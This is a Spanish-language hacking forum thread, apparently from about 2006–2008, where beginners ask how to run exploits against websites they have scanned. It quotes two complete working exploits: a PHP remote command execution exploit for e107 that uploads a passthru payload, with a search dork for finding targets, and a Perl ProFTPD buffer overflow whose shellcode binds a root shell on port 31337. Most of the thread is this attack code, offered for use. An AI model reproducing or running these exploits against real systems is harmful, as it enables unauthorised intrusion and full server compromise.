Cita de: OzX en ſeptiembre 27, 2006, 08:10:04

el perl2exe es para pasar el perl a exe osea ejecutable
pero el active perl es para interpretar el codigo del perl sin pasarlo a exe

Perl2exe no es nada.. es como si hicieras un .bat que en la consola ejecute el perl ..^^

Y ademas es mejor usar bien los exploits desde consola...

Salud0z

excelente referencia esta de 10. Wink

hola.. como va.. mira yo segui todos los pasos pero en la parte de exploit de la pagina esa.. donde te tira la data... me sale asi

#!/usr/bin/php -q -d short_open_tag=on
<?
print_r('
--------------------------------------------------------------------------------
e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands
execution exploit
by rgod rgod @autistici.org
site:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files
--------------------------------------------------------------------------------
');
/*
works with register_globals=On
against PHP < 4.4.1, 5 < PHP < 5.0.6
*/
if ($argc<4) {
print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to e107
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /e107/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost /e107/ cat ./../../../../e107_config.php -p81
--------------------------------------------------------------------------------
');
die;
}
/*
software site:
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

vulnerable code in class2.php near lines 29-37:
...
// Destroy! (if we need to)
if($register_globals == true){
   while (list($global) = each($GLOBALS)) {
      if (!preg_match('/^(_POST|_GET|_COOKIE|_SERVER|_FILES|GLOBALS|HTTP.*|_REQUEST|retrieve_prefs|eplug_admin)$/', $global)) {
      unset($$global); [**]
      }
   }
   unset($global);
}
...
and in e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php near lines 26-40:

...
require_once("../../../../class2.php");
if (!defined('e107_INIT')) { exit; }
unset($tinyMCE_imglib_include); //

// include image library config settings
include 'config.php';

$request_uri = urldecode(empty($HTTP_POST_VARS['request_uri'])?(empty($HTTP_GET_VARS['request_uri'])?'':$HTTP_GET_VARS['request_uri']):$HTTP_POST_VARS['request_uri']);

// if set include file specified in $tinyMCE_imglib_include

if (!empty($tinyMCE_imglib_include))
{
include $tinyMCE_imglib_include; ///[***]
}
...

you can evade

by sending the hash keys of $tinyMCE_imglib_include var and

[**] (this *should* unsets the hash keys...) by sending a multipart/form-data
request with the "GLOBALS" var

here [***] the code will include the temporary file and execute our shellcode

see
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
and
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

for details about this php vulnerabilities
*/

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="-----------------------------7d529a1d23092a\r\n"; #oh, I want to tell you a story, about a Telecom guy *
$data.="Content-Disposition: form-data; name=\"tinyMCE_imglib_include\"; filename=\"suntzu\";\r\n"; #that doesn't know *
$data.="Content-Type: image/jpeg;\r\n\r\n"; #the sovereign art of PHP kung-fu, now is desperate and he's seriously *
$data.="<?php error_reporting(0);set_time_limit(0);echo 'my_delim';passthru('".$cmd."');echo 'my_delim'; die;?>\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n"; #thinking to kill himself, after he loosed his work *
$data.="Content-Disposition: form-data; name=\"-1203709508\"; filename=\"suntzu\";\r\n";//and his honour and self-respect*
$data.="Content-Type: image/jpeg;\r\n\r\n"; //because of some brave guys that rooted his boxes.*
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n"; #Now, guy, don't cry anymore, but... do something *
$data.="Content-Disposition: form-data; name=\"225672436\"; filename=\"suntzu\";\r\n"; #useful, please open the PHP *
$data.="Content-Type: image/jpeg;\r\n\r\n"; #manual, like a respectful student. And start to... *
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n";# *
$data.="Content-Disposition: form-data; name=\"GLOBALS\"; filename=\"suntzu\";\r\n";# *
$data.="Content-Type: image/jpeg;\r\n\r\n";# *
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a--\r\n";# *
$packet ="POST ".$p."e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php HTTP/1.0\r\n";# *
$packet.="Host: ".$host."\r\n";# *
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";# *
$packet.="Content-Length: ".strlen($data)."\r\n";# *
$packet.="Accept: text/plain\r\n";# *
$packet.="Connection: Close\r\n\r\n";# *
$packet.=$data;# *
sendpacketii($packet);# *
if (strstr($html,"my_delim")){# *
echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]); #...pray *
}
echo "exploit failed... register_globals=off here or wrong PHP version\n";
?>

es php y para ese como tengo que hacer.. ya que no esta explicado o en todo caso.. mostrado.. para hacer en ese formato Huh

leei antes.. pero el que pregunto.. dijeron que habia que abrirlo con un ftp.. y que tengo que hacer para usar eso.. nunca use uno soy new.. como ven.. cual me bajo que pasos sigo.. taria bueno si uno que sabe sobre este lo podria poner o decirmelo muchas gracias.. ta todo bueno esto de aprender cositas Cheesy

aprendi rapidisimo esto .. un saludo..

Para ejecutar el exploit no seria "perl exploit.pl ipdata"??

hola tengo una duda del otro manual.. reintale el programa cygwin y comprove que no estuviera en .txt y exta como exploit.c y me sale esto no casho
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion

help me plssss
(estaba cerrado el otro tema por eso posteo aca)

lee el manual bien porfavor.
vy abrire el otro tema.. por si esta cerrado

Hola a todos.. He leido el tutorial y soy un poco nuevo en esto. Yo encontre un xploit que es el siguiente:

Citar

#!/usr/bin/perl -w
#
# $Id: revenge_proftpd_ctrls_24.pl, v1.0 2007/02/18 19:24:22 revenge Exp $
#
# ProFTPD v1.3.0/1.3.0a Controls Buffer Overflow Exploit
# [Old style school sploit against gcc 3.x and linux kernel 2.4]
#
# Original Advisory :
#
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
#
# [ Exploitation condition ]
# - proftpd must be compiled with --enable-ctrls option
# - local user needs permission to connect through unix socket (from proftpd.conf)
#
# This one works for 2.4 exploitation against gcc 3.x
# Payload will bind /bin/sh on port 31337 with ( uid && gid = 0 )
# I was able to use only a <bind_shell> as payload since a normal setuid + execve seems that doesn't work
#
# Tested against:
# - ProFTPD 1.3.0/1.3.0a on Slackware 11.0 compiled with gcc 3.4.6
# *** Against v1.3.0a -- server *could* remain up (in a Denial of Service condition) without binding shell
#
# revenge @darklight~$ ./revenge_proftpd_ctrls_24.pl /usr/local/var/proftpd/proftpd.sock 1
# [ wait some secs then nc on port 31337 ]
# anyone @anywhere:~$ nc <host> 31337
# id
# uid=0(root) gid=0(root) groups=50(ftp)
# exit
# [ after that server will deactivate ]
#
# Alfredo "revenge" Pesoli
#
#
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
# <revenge @0xcafebabe.it>
#

use strict;
use Socket;

if ( @ARGV < 2 ) { &usage(); }

my $hellcode =
# *** Generated with libShellCode
# setuid(0) + setgid(0) + bind(/bin/sh) on port 31337
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x31\xdb\xb0\x2e\xcd\x80".
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80".
"\x89\xc7\x31\xc9\x66\xb9\x7a\x69\x52\x66\x51\x43\x66\x53\x89\xe1".
"\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd".
"\x80\x31\xc0\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x89\xc3".
"\x89\xd9\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\xeb\x18\x5e\x31\xc0\x88".
"\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d".
"\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

my $rsock = shift;
my $tn = shift;

my $ret;
my $nop = "\x90"x200;

use constant LSOCK => '/tmp/tmp.sock';

my %targets = (
'1' => "\x55\xef\xff\xbf" # Slackware 11.0
# Add here your target RET
);

my %tname = (
'1' => "Slackware 11.0"
);

$ret = $targets{$tn};

my $buffer = $nop.$hellcode.("$ret"x70);
my $l = length($buffer);

socket (SOCK, PF_UNIX, SOCK_STREAM, 0) or die "Unable to create socket : $!";
my $rfile = sockaddr_un($rsock);

unlink LSOCK;
my $lfile = sockaddr_un(LSOCK);

bind (SOCK, $lfile) or die "Unable to bind to $lfile";
chmod (00700, LSOCK);

connect (SOCK, $rfile) or die "\nUnable to connect to ".$rsock."\nMaybe server is down or incorrect path\n\n";

print "\n Request length => ".$l."\n";
print " Target => ".$tname{$tn}."\n";

send SOCK, pack("s2", 0),0;
send SOCK, pack("s2", 1,0),0;
send SOCK, pack("C", 188).pack("C",2).pack("s1",0),0;
send SOCK, $buffer,0;

close SOCK;

print "\n

Request sent - try to connect on port 31337\n\n";

sub usage() {
print "\n ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style school ]\n";
print " Alfredo \"revenge\" Pesoli\n";
print " <revenge\ @0xcafebabe.it>\n\n";
print "Usage : $0 <path_to_unix_socket> <targets>\n";
print " Ex : $0 /usr/local/var/proftpd/proftpd.sock 1\n";
print "\n Available Targets :\n";
print " 1 => 0xbfffef55 (Slackware 11.0)\n\n";
exit();
}

Luego lo guarde en un bloc de notas con extension .pl Abri el CMD y puse perl exploit.pl y me salio lo siguiente:

Citar

ProFTPD 1.3.0/1.3.0a Controls Buffer Overflow [ Old Style School ]
Alfredo "revenge" Pesoli
<revenge @0xcafebabe.it>

Usage: exploit.pl <path_to_unix_socket> <targets>
Ex: exploit.pl /usr/local/var/proftpd/proftpd.sock 1

Available Targets :
1 =>0xbfffef55 <Slackware 11.0>

Y no se que tengo que hacer :S no entiendo esa instruccion.. ayudenme.. esque scanee una web y encontre eso.. ayudenme porfavor!

es un exploit local.
no te sirve para nada.
cada exploit es un mundo.

exploit.pl <path_to_unix_socket> <targets>
exploit.pl <ruta_socket> <objetivos>

byezzz

WenaZ hace años que voy lellendo en El-Hacker y PortalHacker he visto este tema Medio Viejito pero Es Que Encontre un Exploit Lo Compile en Perl y Ahora no entiendo las Instrucciones Si Alguien Me Puede Ayudar..

Saludos y Gracias

SI, yo igual tengo esa duda con los exploits.
Grin

	Bienvenido(a), Visitante. Favor de ingresar o registrarse. ¿Perdiste tu email de activación? - Agosto 30, 2008, 07:20:27 Boton Buscar